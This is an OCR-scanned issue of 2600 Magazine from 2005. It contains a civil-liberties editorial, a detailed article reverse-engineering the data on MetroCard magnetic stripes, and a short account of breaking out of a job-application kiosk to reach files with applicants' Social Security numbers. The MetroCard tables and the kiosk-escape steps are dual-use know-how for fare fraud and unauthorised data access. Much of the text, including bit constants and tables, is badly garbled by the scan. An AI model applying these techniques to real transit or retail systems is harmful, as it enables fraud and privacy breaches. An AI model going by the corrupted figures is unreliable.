Alicante, Spain.

A standard ghenc through-

out t h e country. I t takes credit cards and
coins. I n addition this phone has SMS and
fax capabilities.

m
li eril&d by n.TI& me
coin $ W a s w&mflkr
-d-@~-~pr I T Jlholl..

7
For more exciting foreign payphone photos,
take a Look a t the inside back cover!
and say, it lately seems t h a t it would be t h e
endless f i g h t against t h e increasing restrictions
of our society. Whether it's t h e Latest govern-
ment crackdown on something t h a t wasn't even
a crime a decade ago o r another corporate law-
suit against someone whose actions would have
seemed completely harmless i n another time or
place, we cannot seem t o shake this perpetual
f i g h t we're forced into. And, Like most things,
there i s good and bad i n this fact.
Fighting i s good. It keeps you awake and re-
defines what it is you stand for. Done properly,
it can also open up a l o t of eyes and bring a
great number of people i n t o t h e battle, hope-
fully on your side. But becoming a constant vic-
tim of what's going on around you isn't at a l l
constructive. I n some ways we seem t o always
expect things t o get worse and when they do
we're not surprised. And with that, we Lose our
outrage and replace it with resignation.
We need t o do everything i n our power t o
avoid falling i n t o t h a t latter category. That's
what we hope t o accomplish i n these pages - t o
challenge, t o ask questions, t o n o t be intimi-
dated i n t o acquiescence. The only reason we've
survived this long is because our readers have
been there t o encourage us and t o prove t h a t
what we say and what we do actually counts for
something. It's important t o extend t h a t reas-
surance a l l throughout t h e community - indi-
vidually and collectively - so t h a t we n o t only
survive but grow stronger. I n this way it w i l l i n -
deed be possible t o reverse the tide and build
something positive.
We a l l derive a fair amount o f pleasure i n
listing t h e latest negative trends i n our society.
So let's take a little time t o focus on some o f
the highlights.
The recent actions o f t h e Federal Communi -
cations Commission have been quite frighten -
i n g i n their zeal t o restrict and punish speech
t h a t they disapprove of. Because of t h e trauma
,
suffered due t o the events o f February 1, 2004
(when part o f Janet Jackson's breast was mo-
the FCC has made it i t s mission t o become the
morality police o f t h e airwaves. Congress has
jumped i n on t h e act, apparently frightened by
a few crusaders o f decency i n t o thinking t h a t
such restrictive views reflect those of t h e na-
tion. Their latest idea i s t o impose fines o f
$500,000 for each and every utterance o f a
word they disapprove of. While few would sup-
port the idea o f turning t h e public airwaves
i n t o a bastion o f gutter speech, what these
threats have accomplished i s t o instill fear and
force broadcasters t o constantly err on t h e side
o f caution. Translation: n o controversy, nothing
outside t h e norm, and a great deal o f paranoia.
The re,sult is a wlhole l o t o f blandness which is
far wclrse than an occasional displa y o f bad
taste.
We a u ~ t u > laugh
t a t absurdities Lllc
Fraudulent Online Identity Sanctions Act which
actually i s being considered by t h e House of
Representatives. It's designed t o deal with one
of t h e nation's biggest crises: people submit-
ting false information when registering Inter-
n e t domain names. While this i n itself wouldn't
be enough t o get you convicted o f a crime (yet),
it can be used t o significantly enhance penal-
ties if, for example, someone i s sued over t h e
content of a web page. Many whistle-blower
and dissident websites would f i n d it impossible
t o operate if they had t o do so while giving out
their realidentities and locations. Yet such sites
provide a very valuable service t o t h e public. By
adding this intimidation, it suddenly becomes a
potential crime t o t r y and remain anonymous.
Equally absurd i s a new law passed i n Utah
t h a t requires Internet service providers t o keep
track o f and provide a way t o block access t o
porno!graphic websites. While this may sound
attracti v e t o a politician or a media outlet seek-
i n g t o whip up hysteria, this has always been
something t h a t a user could easily implement
with varying degrees o f success using different
types o f software. But now t h e ISP i s being ex-
pected t o take on this responsibility, somehow
/keeping track of every website i n the world that
has material deemed "harmful t o minors" and
facing felony charges i f they don't block access
t o them on demand. The mere creation and dis-
tribution of such a blacklist by the government
is an incredible waste of time and effort at best.
It's as ridiculous an expectation as what we see
i n many restrictive foreign regimes where the
realities of the net simply aren't considered i n
the face of religious and/or totalitarian
zealotry. Like so many other ill-advised bits o f
Legislation Lately, the power and responsibility
of the individual is being overlooked i n favor of
proclamations from governmental agencies who
really have no business dictating morality.
None of this even begins t o address the evils
of the Patriot Act and its proposed successors,
legislation drawn up and passed quickly i n the
wake of September 11without debate or analy-
sis of any significance. We've devoted space i n
these pages i n the past t o the risks we all face
as a result of this monumentally bad idea. No
doubt we will continue t o do so i n the future.
And this is certainly not something restricted
by our borders. Recently the "Anti-Terror Law"
was finally passed i n Britain after much debate.
This new law allows the authorities to detain
British citizens as well as foreigners indefinitely
and without charge i f they are "terrorist sus-
pects," a classification which no doubt will be
bent i n all sorts of imaginative directions t o
suit the accusers. It also becomes the only
country i n the European Union t o suspend the
right t o a fair trialin such circumstances. About
the only bit of positive news t o come out of this
is that extensive debates won the right t o have
this law reviewed and possibly repealed i n
2006. Again, we are reminded of what Ben
Franklin once said: "Those who would give up
essential liberty for temporary safety deserve
neither liberty nor safety." I n a quote that
seems t o fit this categorization remarkably
well, Prime Minister Tony Blair said, "Those con-
siderations of national security have t o come
before civil liberties however important they
are."
When you look closely at these trends and
those that we have been covering over the
years, it becomes clear that most of them have
nothing t o do with September 11, threats of at-
tack, wars and invasions, or anything else that
we've lately become obsessed with. Rather,
I
these incidents have become excuses for push-
ing policies that have been i n the works for
years. The element of fear that is constantly
bombarding us is the best thing t h a t could have\
happened for those who want more control,
more surveillance, and a crackdown on dissent.
When all is said and done, it's clear who the
real enemy of the people is. While the mass me-
dia, government, and corporate world would
Like that enemy t o be those who challenge the
system, we believe they're i n for a disappoint-
ment. That designation belongs t o those who
are hard at work dismantling t h e freedoms that
we have a l l aspired t o i n the interests of "secu-
rity" or because they feel they have Lost control.
It's clear that they should Lose control because
it's obvious that power i n their hands i s not a
good thing at all.
The fact is most people get it. They have lit-
tle problem dealing with controversy, differing
opinions, or common sense. They don't need t o
be talked down t o or have their hands held at
every step of the way. Most people understand
that the world they Live i n isn't Disneyland and
that an adult society doesn't have t o be reduced
t o a child's level i n order t o be safe. But too
many of these same people don't step up when
others try and restrict what they can say, do,
read, access, or even think. Maybe they assume
someone else will do this for them. Maybe they
think they're actually i n the minority and ought
t o stay quiet for the purpose o f self-preserva-
tion. Or perhaps they just don't take any of
these people seriously and are content t o laugh
at them from the sidelines. ALL o f these are pre-
cisely the reactions that t h e control seekers
want more than anything. "ALL that is required
for evil t o triumph is for good men t o do noth-
ing." We can't fall into that trap.
What can we do? It's really simple. Unity on
these issues is all we need. Wherever you find
yourself i n today's world, you have a voice and
you can reach and influence people on all dif-
ferent levels. All it takes is t h e desire t o do this
and a Little persistence. Educate yourself on the
issues and why they matter. Bring it up at your
place or work, i n your school, t o your parents,
friends, or children. Don't be shrill or offensive.
Put yourself i n the position o f other people and
inject your insight into the equation so that you
can effectively communicate why the issues
that matter t o you should also matter t o them.
This is how movements are born. And that is
what we need if we hope t o escape what is
looming on the horizon.
 "If tyranny and oppression come to this land, it
will be in the guise o f figh ting a foreign enemy.
- James Madison. 1

2 Floweilield, St. James, NY 11780.

Periodicals postage paid a t St. James, NY and additional offices.
POSTMASTER:
Send address changes t o
2600, P.O. Box 752 Middle Island, NY 11953-0752.
Copyright (c) 2005
2600 Enterprises, Inc.
YEARLY SUBSCRIPlION:
U.S. and Canada - $20 individual,$50 corporate (US. funds).
Overseas - $30 individual, $65 corporate.

II
Back issues available for 1984-2004 at $20 per year, $26 per year overseas.
Individualissues available from 1988 on at $5.00 each, $6.50 each overseas.

IADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:

2600 Subscription Dept., P.O. Box 752 Middle Island, NY 11953-0752 (subs@2600.com).
FOR LEllERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99 Middle Island, NY 11953-0099
(Letters@26OO.com, articles@2600.com).
2600 Office Line: 6 3 1 - 7 5 1 - 2 6 0 0
2600 FAX Line: 6 3 1 - 4 7 4 - 2 6 7 7

by Redbird
redbird@2600.com
I n this article, Iwill explain many of the inner
workings of the New York City Transit Authority fare col-
lection system and expose the content of MetroCards. I though there is no visible difference between the
will start off with a description of the various devices of stripes of these cards and the stripes of two-track
the fare collection system, proceeding into the details
of how t o decode the Metrocard's magnetic stripe. This
article is the result of many hours of experimentation,
plenty of cash spent on MetroCards (you're welcome,
MTA), and Lots of help from several people. I'd like t o
thank everyone at 2600, O f f The Hook, and all those
who have mailed i n cards and various other informa-
tion.
Becoming familiar with how magnetic stripe tech-
nology works will help you understand much of what is
discussed i n the sections describing how t o decode
MetroCards. More information on this, including addi-
tional recommended reading, can be found i n "Mag-
netic Stripe Reading," also i n this issue.
Terms
These terms will be used throughout the article:
FSK - Frequency Shift Keying. A type of frequency
modulation i n which the signal's frequency is shifted
between two discrete values.
MVM - MetroCard Vending Machine. MVMs can be
found i n every subway station. They are the large vend-
ing machines which accept cash i n addition t o credit
and debit.
MEM - MetroCard Express Machine. MEMs are vend-
ing machines that accept only credit and debit. They are
often located beside a batch of MVMs.
MTA - Metropolitan Transportation Authority. A
I public benefit corporation of the State of New York re-
sponsible for implementing a unified mass transporta-
I tion policy for New York City and counties within the
"Transportation District."
NYCTA - New York City Transit Authority. Under the
control of the MTA, the NYCTA is a public benefit corpo-
ration responsible for operating buses and subway
trains i n New York City.
RFM - Reduced-Fare MetroCard. RFMs are available
t o the elderly or people with qualifying disabilities.
Typical RFM fare is half or less than half of the standard
fare.
Common MetroCard. This term will refer t o any
MetroCard available t o the public without special re-
quirements. Examples include standard pay-per-ride
cards, standard unlimited cards, and single-ride cards.
Special MetroCard. This term will refer t o any Metro- i s t h e MetroCard. Preceded by a token-based sys-
i Card not available t o the general public. Examples tem, the MetroCard i s n o w used for every aspect
.. . - .
include reduced-fare cards, student cards, and
employee cards.
Single-Track MetroCard. This term will refer t o any
MetroCard that has a one-track magnetic stripe (al-
cards). The following types of cards are single-track:
Single-Ride and Bus Transfer MetroCards.
Dual-Track MetroCard. This term will refer t o a l l
MetroCards with the exception o f the Single-Track
MetroCards mentioned above. The following types of
cards are some examples of dual-track cards: pay-per-
ride, pre-valued, unlimited, and reduced-fare.
Passback Period. This term w i l l refer t o the time pe-
riod before an access device will allow you t o use an un-
limited card again after swiping it. During this period,
the devices generally respond with t h e message "JUST
USED".
Standard Cards and Standard Readers. These terms
w i l l refer t o cards containing a magnetic stripe (credit,
banking, etc.) or readers of these cards that conform t o
the standards set forth i n any or all o f the following IS0
specifications: 7810, 7811, 7813, and 4909.
Cubic Transportation Systems
The fare collection system t h e MTA uses was
developed by Cubic Transportation Systems, a
subsidiary of Cubic Corporation. The patents I found t o
be related t o the current New York City system filed by
Cubic Corporation are as follows:
4,877,179 - Farebox S e c u r i t y D e v i c e
5,056,261 - T u r n s t i l e System
5,072,543 - T u r n s t i l e Mechanism
5 , 1 9 1 , 1 9 5 - F a r e Card R e a d - W r i t e r Which
-Overwrites Oldest o r Invalid Data
5,215,383 - T i c k e t S t o c k and T i c k e t D i s p e n s e r
5 , 2 9 8 , 7 2 6 - F a r e Card R e a d - W r i t e r Which
-Overwrites Oldest o r Invalid Data
5 , 3 3 3 , 4 1 0 - C o n t r o l l a b l e B a r r i e r S y s t e m For
- P r e v e n t i n g Unpaid A d m i s s i o n t o a Fee-Paid Area
5 , 5 7 4 , 4 4 1 - Mass T r a n s i t I n d u c t i v e D a t a
-Communication S y s t e m
5 , 6 1 2 , 6 8 4 - Mass T r a n s i t I n d u c t i v e D a t a
CCommunication System
6 , 5 9 5 , 4 1 6 - S y s t e m For R a p i d l y D i s p e n s i n g and
-Adding Value t o Fare Cards
6,655,587 - Customer A d m i n i s t e r e d A u t o l o a d
6,789,736 - D i s t r i b u t e d A r c h i t e c t u r e For
,Magnetic Fare Card P r o c e s s i n g
Servicing, apart from routine collection o f
fares, on MTA equipment seems t o be done by
Cubic employees, not the MTA.
The MetroCard System
At the core of the MTA fare collection system
Page 7 A
 \
fare collection and allows for fare options that would never have been previously possible (e.g., Em-
ployee, Reduced-Fare, and Student MetroCards). MetroCards can currently be purchased a t MVMs,
MEMs, token booths, and various merchants throughout the New York City area. Iwill categorize t h e
Metrocard access devices into two types: reading devices and fare collection devices. Both of these de-
vices are networked i n a complex system which allows the MTA, within minutes, t o have up-to-date in-
formation on every card that has been issued. This also allows them t o disable any card at will. The
hierarchy of the network i s shown below (as described i n patent 6,789,736).
OUT OF SVSTEM AWs- -
i
PRIM4RY COMROL AREA -

K!7
BhEP* DUT

!nKENsooTW.Eaur9?ENz
....Z.....Z......
i
TURNSTILES

[IKEhl BO@T
EYC QAR ENILODEFI
F F U FF

The physical characteristics o f MetroCards follow those of standard cards (see Terms) almost ex-
actly, but are one third the thickness. They have a diagonal notch cut out i n the upper-right hand cor-
ner 3 1/8" from the Left and 5/16" from the top of the card. Additionally, they have a 1/8" diameter
hole, with its center 1/4" from the left and 5/16" from the top of the card, which is used t o aid
machines that suck your card i n (bus fare boxes, MEMs/MVMs, handicapped entry/exit machines, etc.).
Vending Machines
MEMs and MVMs are Located throughout the subway system. They allow you t o purchase or refill
various common MetroCards with either cash or a credit card. RFMs can't be purchased at machines but
can be refilled. On the front of the MEM or MVM i s a tag with the machine's unique I D number.
The BIOS System Configuration screen from an MEM looks Like this:
AMIBIOS S y s t e m C o n f i g u r a t i o n ( C ) 1 9 8 5 - 1 9 9 7 , American Meqatrends Inc.,

Main P r o c e s s o r : Celeronftm) B a s e Memory S i z e : 640KB

Math P r o c e s s o r :Built-In E x t . Memory S i z e : 14336XB
F l o p p y D r i v e A: : None Display Type : VGA/EGA
F l o p p y D r i v e B: : None Serial Port(s) : 3F8,2F8
AMIBIOS D a t e : 07/15/95 Parallel Port(s) : 378
Processor Clock : 3 0 0 A MHz E x t e r n a l Cache : 128KB,Enabled

ATA(P1) D e v i c e ( s ) T y p e Size LBA 32Bit Block PI0

Mode Mode Mode Mode
Primary Master : Hard D i s k 5729MB LBA On 16Sec 4

PC1 Devices: PC1 O n b o a r d USB C o n t r o l l e r , I R Q l l

PC1 Onboard B r i d g e D e v i c e PC1 O n b o a r d E t h e r n e t , I R Q l 5
PC1 Onboard IDE
PC1 Onboard VGA

FPGA ver. C , B a s e A d d r e s s : 500h

BSP CPU.. ...
M i c r o c o d e OK

I have no reason t o believe that the MVM hardware is any different.

t b 0 0 Magazine
 \
Receipts
Receipts can be obtained from MEM and MVM machines by answering "yes" when prompted. They
possess a lot of information about the MEM/MVM, subway station, and card. You can match a receipt t o
a card by comparing the serial numbers. Let's take a look at some samples:
MVM RECEIPT MVM RECEIPT MEM RECEIPT

MTA NYC TRANSIT MTA NYC TRANSIT MTA NYC TRANSIT

ASTOR PLACE NASSAU AV & MANHATTAN AV 14TH STREET & 6TH AVENUE
NEW YORK CITY NY NEW YORK CITY NY NEW YORK CITY NY

MVM #: 0 5 4 5 f R 2 1 9 0701) MVM #: 1738(N408A 0 5 0 0 ) MEM #: 5383(N513 0 4 0 0 )

T r a n s : S a l e OK T r a n s : S a l e OK T r a n s : Add T i m e OK
P a y m e n t Mode: C a s h P a y m e n t Mode: C r e d i t Amount : $ 10.50
Amount : $ 7.00 Amount : $ 21.00 I n i t i a l Type:030
Card Value: $ 0.00 Card Value: $ 0.00 7-DAY RFM UNLIMITED
C h a n g e Due: $ 3.00 Time Added: 030
C r e d i t C a r d #: XX5346 7-DAY RFM UNLIMITED
S e r i a l #:I059909877 Auth#: 0 0 0 0 0 8
Type: 023 R e f #: 0 6 0 6 1 5 7 6 2 1 2 9 ATM C a r d #: XX0952
1 -DAY UNLIMITED Auth#: 7 6 0 3 4 6
S e r i a l #: 1 0 2 7 0 6 6 8 4 8 R e f #: 0 2 9 0 8 9 5 5 9 6 6 8
Questions? T y p e : 024
C a l l ( 2 1 2 ) METROCARD 7-DAY UNLIMITED S e r i a l #:0987218036

Questions? Questions?
C a l l ( 2 1 2 ) METROCARD C a l l ( 2 1 2 ) METROCARD

Most o f the information on t h e receipt i s fairly obvious, but notice the line t h a t begins with "MEM
#" or "MVM # .The first four digits correspond t o the actual MEM or MVM I D number as found on t h e
machine. The next Letter and following three digits inside the parenthesis correspond t o t h e closest
token booth. This ID can also be found on the booth itself. The meaning of t h e next f o u r digits i s cur-
rently unknown. However, they are unique t o each machine that has the same b o o t h ID, but are not
unique among machines with different booth IDS. They seem t o simply be a unique I D for each
MEM/MVM i n the station, possibly grouped by location. See "MEM/MVMsH for a table.
Now Look t o the bottom of the receipt. The Line t h a t begins with "Type:" (or " I n i t i a l Type:" if an RFM
is being refilled) gives the numerical card subtype value followed by a description o f t h e type on the
following Line.
Receipts purchased with a credit card contain additional fields that allow t h e MTA t o verify the
credit card holder i n the case that he/she decides t o Lose t h e MetroCard.
Turnstiles
The use of a turnstile i s the most common way t o enter the subway. Entry i s granted by swiping a
valid MetroCard through the readerjwriter located on the outside of each turnstile. Once swiped, the
LCD display on the turnstile will display a message. Some common messages:
GO. Message displayed for Unlimited MetroCards.
GO. I RIDE LEFT. Message displayed for Student MetroCards, where "1"is the number o f rides Left for
the day.
JUST USED. The passback period for the Unlimited MetroCard i s not up.
GO. 1XFER OK. Message displayed when transferring from a bus.
Above the LCD there are a series of round indicators. Of these, one has an arrow pointing i n the di-
rection of the turnstile i n which you would enter after paying your fare, and another reads "No" and a
do-not-enter bar which, when lit, indicates that the turnstile is not active. After paying your fare, an-
other indicator below the green arrow lights t o indicate that you may proceed through t h e turnstile
without smashing your groin i n t o the arm.
Above those, there are three horizontal bar indicators contained within a rectangular cutout. When
a Reduced-Fare MetroCard is swiped, the top indicator (red) will light. When a Student MetroCard i s
swiped, the middle indicator (yellow) will Light. When an Employee MetroCard i s swiped, t h e bottom
indicator (the color of which I ' m unsure of) w i l l light. These indicators are present on both sides of the
turnstiles and they allow transit cops, many o f whom are undercover, t o monitor t h e types o f cards be-
i n g used by riders. This helps detect, for example, when Student MetroCards are being used a t times
when school is not i n session or when an obvious misuse o f an Employee or Reduced-Fare MetroCard
occurs.
F >
Reading MetroCards
MetroCards are relatively difficult t o read. You will not be able t o read them with off-the-shelf mag-
netic stripe readers, so please don't waste your money. The reason for this i s not t h a t the format i s dif-
ferent; MetroCards use Aiken Biphase (also known as frequency shift keying (FSK)) just like standard
cards. However, the hardware that ships with these readers is designed for a completely different (and
well-documented) specification. They require many "clocking bits," which consist of a string o f zero-
bits at the beginning of the stripe t o aid i n setting a reference frequency for decoding. Additionally,
most readers also look for a standard start and end sentinel that exists on standard cards t o denote
the start of a particular track. On top o f that, characters on these cards are defined as either four or
six b i t blocks (depending on the track) and contain a longitudinal redundancy check (LRC) character
after the end sentinel t o verify data integrity. Needless t o say, MetroCards don't have any of these
properties and contain fields of arbitrary length; thus, another method of reading and decoding i s re-
quired.
Fortunately, magnetic heads are everywhere (e.g., cassette tape players) and the output from mag-
netic heads when passed over a magnetic stripe consists of voltage spikes i n the audible frequency
range. Since sound cards are excellent A/D converters for this range of input and are readily available
and very cheap, we can use the microphone input interfaced t o a magnetic head for the purpose of
creating our own reader (for a l o t less than the MTA i s paying, I'm sure!). See the article "Magnetic
Strioe Readina" i n this issue for more details.

1 For the same reason t h a t reading was initially difficult, writing t o MetroCards i s extremely difficult,
and is still a work-in-~roqresswhich will not be discussed i n this article. A techniaue similar t o that of
t h e decoder (in reverie) ;an be used t o write t o cards, although it i s much more difficult t o implement
and obviously requires more equipment than just a sound card and a magnetic head. For those of you
who realize how this can be done and have the ability t o build the equipment, kudos, but keep i n mind
the ramifications of being caught using a card you wrote t o yourself. Modifying the data on cards does
work. But the MetroCard system is very complex and allows for the surveillance of this sort of activity.
The goal of this project i s t o learn how the system works, how it can be theoretically defeated, but cer-
tainly not t o get stuck i n prison.
Apart from these difficulties, MetroCard tracks are defined as follows: Dual-Track MetroCards have
two tracks - one track being twice the width of the other - and will be referred t o as track 1-2 and track
3; Paper MetroCards have one track which will be referred t o as track 1-2. These track names (as I
refer t o them) correspond t o the same track fields t h a t have been established by IS0 7811.
-
Decoding Dual-Track MetroCards Track 3
Track 3 on Dual-Track MetroCards contains static data. It i s written when the card is produced and
the serial number is printed on the back, and i s not written t o thereafter by any machine. Some data
found on this track can also be found by looking at the information printed on t h e back of the card.
The track format is as follows:
Track 3 C o n t e n t O f f s e t Length
--------------- ------ ------
1: Start Sentinel 0 15
2: Card Type 15 4
3: Unknown 19 4
4: E x p i r a t i o n Date 23 12
5: Unknown 35 4
6: Constant 39 8
7: unknown 47 8
8: S e r i a l Number 55 80
9: Unused 135 16
10: Unknown 151 16
11: End S e n t i n e l 167 93

Decoding track 3 is accomplished as follows:

I. Constant: OOOOOOOllOOOlZl
2. Convert binary t o decimal
* See "Card Types" for a lookup table.
3. Use is n o t y e t known
4. To determine the expiration date for common MetroCards:
* Convert binary to decimal
* Divide the decimal value b y 2, round up
* Convert the decimal value to year/month format as follows:
o Year: Integer value o f the decimal value divided by 12
o Month: Value o f the modulus o f the decimal value and 12
* A d d 1992 to the year
\Page I D 2600 Magazine 1
r
* The expiration date is the last day o f the previous month
* Note: Non-common MetroCards seem to have different date
offsets
* Note: This expiration date is the date the physical card can
no longer be used and is considered invalid. See the track
1-2 expiration date field for more information.
5. Use is notyet known
6. Constant: 00001101
7. Use is not yet known
8. Convert binary to decimal
9. Unused field
10. Use is not yet known
11. Constant:
00100101001100100110100101100101010011001010010
1001100110101010011010010101001101001010110101

Decoding Dual-Track MetroCards Track 1-2 -

Track 1-2 on Dual-Track MetroCards contains variable data. It i s written t o by every machine used
for fare collection, reading devices excluded. Interestingly enough, track 1-2 does n o t only contain i n -
formation pertaining t o the last use, but also t o the use before that. These two records are separated
by a strange set of field separating bits, which contains i n it a b i t t h a t seems t o be h a l f o f t h e one-bit
frequency (which i s a non-standard use of FSK). The most reliable way t o find t h e second track i s t o
search for a second start sentinel, both o f which are identical for each record. The track format i s as
follows:

Content Offset

Start Sentinel
Time
Card Sub-Type
Time
Date
T i m e s Used
E x p i r a t i o n Date
Transfer B i t
L a s t Used ID
C a r d Value
P u r c h a s e ID
Unknown

Decoding track 1-2 is accomplished as follows:

1. Constant: O O l l O l O l l l
2. See 4
3. Convert binary to decimal
* The card sub-type corresponds to the sub-type as indicated
on the receipt if one was obtained from an MEM/MVM.
* See "Card Types" for a lookup table.
4. To deal with the limited storage space on the Metrocard stripe,
each bit in this field and field (2) represents 6 minutes. To
determine the last time used for common MetroCards:
* Concatenate the binary from (2) with the binary from this
field
Convert to decimal
* Multiply decimal value by 6
* Result is the number of minutes since 01:OO that the card
was last used
5. Convert binary to decimal
This field contains the last usage date, which can be
determined by calculating an offset based on a card o f the
same type with a last usage on a known date. However, since
this field only has 10 bits, dates will most likely roll
overafter 1024 (2"IO) days anda new ofr4et will have to be
determined. Offsets also seem to differ with different types
of MetroCards.
6. Convert bina ry to decimal
* The times used field is incremented every time you use the
/ card to pay a fare except during a transfer. I n that case, the
transfer bit is set and the times used field remains the same.
7. Convert binary to decimal
* Determine offset based on the description in 5 to determine
the exact expiration date o f a card. Alternatively, subtract
the date field from this field to determine how many days
after the last usage the card expires.
* Do not confuse this field with the expiration date field on
track 3; it is only used on cards which expire a set number
of days afteryou first use them (e.g., unlimited cards) and
will not be set for cards such as pay-per-ride which do not
have an expiration date.
8. Bit is 1 i f the last use was for a transfer, 0 otherwise
9. Convert binary to decimal
* This field seems to have a completelyseparate lookup table
that is used internally by the fare collecfion system.
* See "Last Used IDS" for a lookup table.
10. Convert binary to decimal
* The result is the value remaining on the card in cents.
11. Convert binary to decimal
This field seems to have a completelyseparate lookup table
that is used internally by the fare collection system to match
the value of this field with an MVM ID number (such as those
you can find on receipts).

Card T y p e s ( p a r t i a l )
Type Subtype Description
---- ------- -----------
0 0 FULL FARE
0 10 PRE-VALUED
0 12 PRE-VALUED ( $ 1 0 . 0 0 )
0 13 PRE-VALUED ( $ 2 . 0 0 )
0 14 L o n g I s l a n d R a i l Road
0 19 PRE-VALUED ( $ 4 . 0 0 )
0 23 1-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 24 7-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 25 7-day E x p r e s s Bus U n l i m i t e d ($4.00 f a r e )
0 26 30-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 29 AIRTRAIN
0 30 7-DAY RFM UNLIMITED ( $ 2 . 0 0 f a r e )
0 43 TransitChek
0 46 TransitChek
0 47 TransitChek
0 48 T r a n s i t C h e k 30-DAY UNLIMITED
0 56 1-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 57 7-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 59 30-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 62 SingleRide ($1.50 f a r e )
0 87 S i n g l e R i d e ($2.00 f a r e )
4 2 Two-Trip S p e c i a l Program P a s s
4 5 G r a d e s 7-12
4 13 1 / 2 F a r e - G r a d e s K-12

L a s t U s e d IDS ( p a r t i a l )
ID Location
-- - - ----- -
1513 1 4 t h S t / U n i o n Sq
1519 8 t h St/Broadwav tA39)
1880 L e x i n g t o n Ave - ( ~ 6 0 l ) '
1942 ASTOR PLACE ( R 2 1 9 )
2157 34th S t / 6 t h Ave (N506)
2204 42nd St/Grand C e n t r a l
2278 9 t h S t r e e t PATH

MEU/ElYMs (partial)
Location
----
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
8TH STREET 6 BROADWAY MEM
8TH STREET 6 BROADWAY MEM

\Page 32 1?bD0 flagazine /

6 5 S T ~6 FT.~ HAMILTON
14TH STREET 6 8TH AVE
MVM
MEM
0982(CO28
5314(HOOl
0700)
0702)
This project is far from over, a n d there are still\
I S T AVE 6 14TH STREET MVM 1358(H007 0700) tons o f data that need t o be collected. You can
1ST AVE 6 14TH STREET MVM 1145(H007 0701)
1 7 5 ST/FT. WASHINGTON AV MVM 1632(N010 0400) help i n many ways:
I 7 5 ST/FT. WASHINGTON A MVM 1 6 1 1 (NO10 0700) * Collect receipts every t i m e you purchase a
I 7 5 ST/FT. WASHINGTON AV MEM 5274(N010 0701)
W 4TH ST - WASHINGTON SQ MVM 0321(N080 0700) MetroCard and send them t o us. This w i l l help us
W 4TH ST - WASHINGTON SQ MVM 0109(N080 0701)
FORDHAM ROAD MVM 0550(N218 0700) expand (and keep updated) our database of the
LEXINGTON AVE - 3RD AVE MVM 0740(N305 0401) booths and MEMs/MVMs contained within each
NASSAU AV 6 MANHATTAN AV MVM 1738(N408A 0500)
34TH STREET/SIXTH AVENUE MVM 1428(N506 0702) station. Also, if possible, keep t h e MetroCard as-
34TH STREET/SIXTH AVENUE MVM 0540(N507 0701)
14TH STREET 6 6TH AVENUE MEM 5383(N513 0400) sociated with t h e receipt.
CHRISTOPHER STREET
CHRISTOPHER STREET
MVM
MVM
0637(R125
0063(R125
0700)
0701)
* I f you notice anything unusual, such as a
14TH STREET - 7TH AvENUE MVM 0294(R127 0400) frozen MTA kiosk (MEM, MVM, reader, etc.), open
I4TH STREET - 7TH AVENUE MVM 1643(R127 0401)
I4TH STREET - 7TH AVENUE MVM 0357(R127 0700) equipment (while repairs are being done), or
I4TH STREET - 7TH AVENUE MVM 0376(R127 0701)
34TH STREET-PENN STATION MVM 0553(R138 0701)
anything else, take some good pictures. As o f
WALL STREET 6 BROADWAY MVM 1123(R203 0400) now, photography bans are being proposed for
WALL STREET 6 BROADWAY MVM 1038(R203 0700)
ASTOR PLACE MVM 0654(R219 0400) the New York City subway system, b u t are not yet
ASTOR PLACE MVM 0586(R219 0700)
ASTOR PLACE MVM 0545(R219 0701)
i n place. So know your rights.
ASTOR PLACE MVM 0744(R220 0700) * I f you're paying for a bus r i d e with change,
ASTOR PLACE MVM 0318(R220 0701)
14TH ST. - UNION SQUARE MVM 0576(R221 0400) get a Bus Transfer MetroCard a n d send it t o us if
I4TH ST. - ONION SQUARE MVM 0514(R221 0401)
I4TH ST. - UNION SQUARE MVM 0475(R221 0700)
you don't intend t o use it. Make sure you note the
14TH ST. - UNION SQUARE MVM 0564(R221 0701) route, direction, time, date, a n d any other ap-
23RD STREET - PARX AVE MVM 0489 (R227 0701)
28TH STREET - PARK AVE MVM 1228(R229 0700) plicable information.
Conclusion New things are being discovered and more
As you may have noticed, Ihaven't provided a data is being collected every day, so consider this
way t o decode the Single-Track MetroCards yet. article a "snapshot" o f a work i n progress. You can
Bus Transfer MetroCards are collected after use find and contribute t o t h e data being collected
and the magnetic stripe of Single-Ride Metro-
Cards i s written with bogus data after use. We on this system at http://www.2600.com/mta and
simply haven't received enough unused samples by sending us additional information a t 2600
t o be able t o reverse-engineer a l l the information Metrocard Project, PO Box 752, Middle Island, NY
contained on these cards. 11953 USA.

by clorox
I'm sure most people searching for a job have
filled out an electronic application a t a business
on one of their machines. I know about four
months ago my friend was looking for a job and I
figured I ' d help him find one. No one was hiring
so he decided t o t r y a store i n the mall. The store
was JC Penney. We were brought i n t o a room with
two computers. He sat down and started t o fill
out his application and I,being the curious one I
am, snooped around.
The application itself was an html file t h a t
was being shown i n IE i n fullscreen mode. Con-
trol-alt-delete did no good so Icontrol escaped
, and it brought up the taskbar with the start but-
\Xpt-ing so05
ton and the tasktray. The start menu was bare,
no way for me t o execute an application there,
just a shutdown button. But i n t h e task tray they
had Mcafee Antivirus running. I ' m n o t sure if it
was a corporate enterprise version b u t Idouble
clicked it t o t r y t o find a way Icould access t h e
hard drive. There was a field w i t h a browse but-
ton next t o it where you could change your virus
database and it let me view t h e hard drive as well
as the networked drives. Iopened a notepad file
just so Icould see t x t files easier i n t h e browser.
Iwas snooping around when Icame upon a folder
i n t h e C drive called apps.
The text files i n this folder were titled by a
nine digit number. Iopened o n e o f t h e text files
page 1 3 1

/and it was Amie Laster's application. Formatted
i n this way:
I I
ssn-ssns-snn Amie Laster 0000101010101
~010110101011
The others were exactly like this so anyone
could just sit down here, access everyone's appli-
cations, and pretty much exploit the person using
this data. Isent an anonymous letter t o the dis-
trict office. I'm not sure if it's been fixed or not
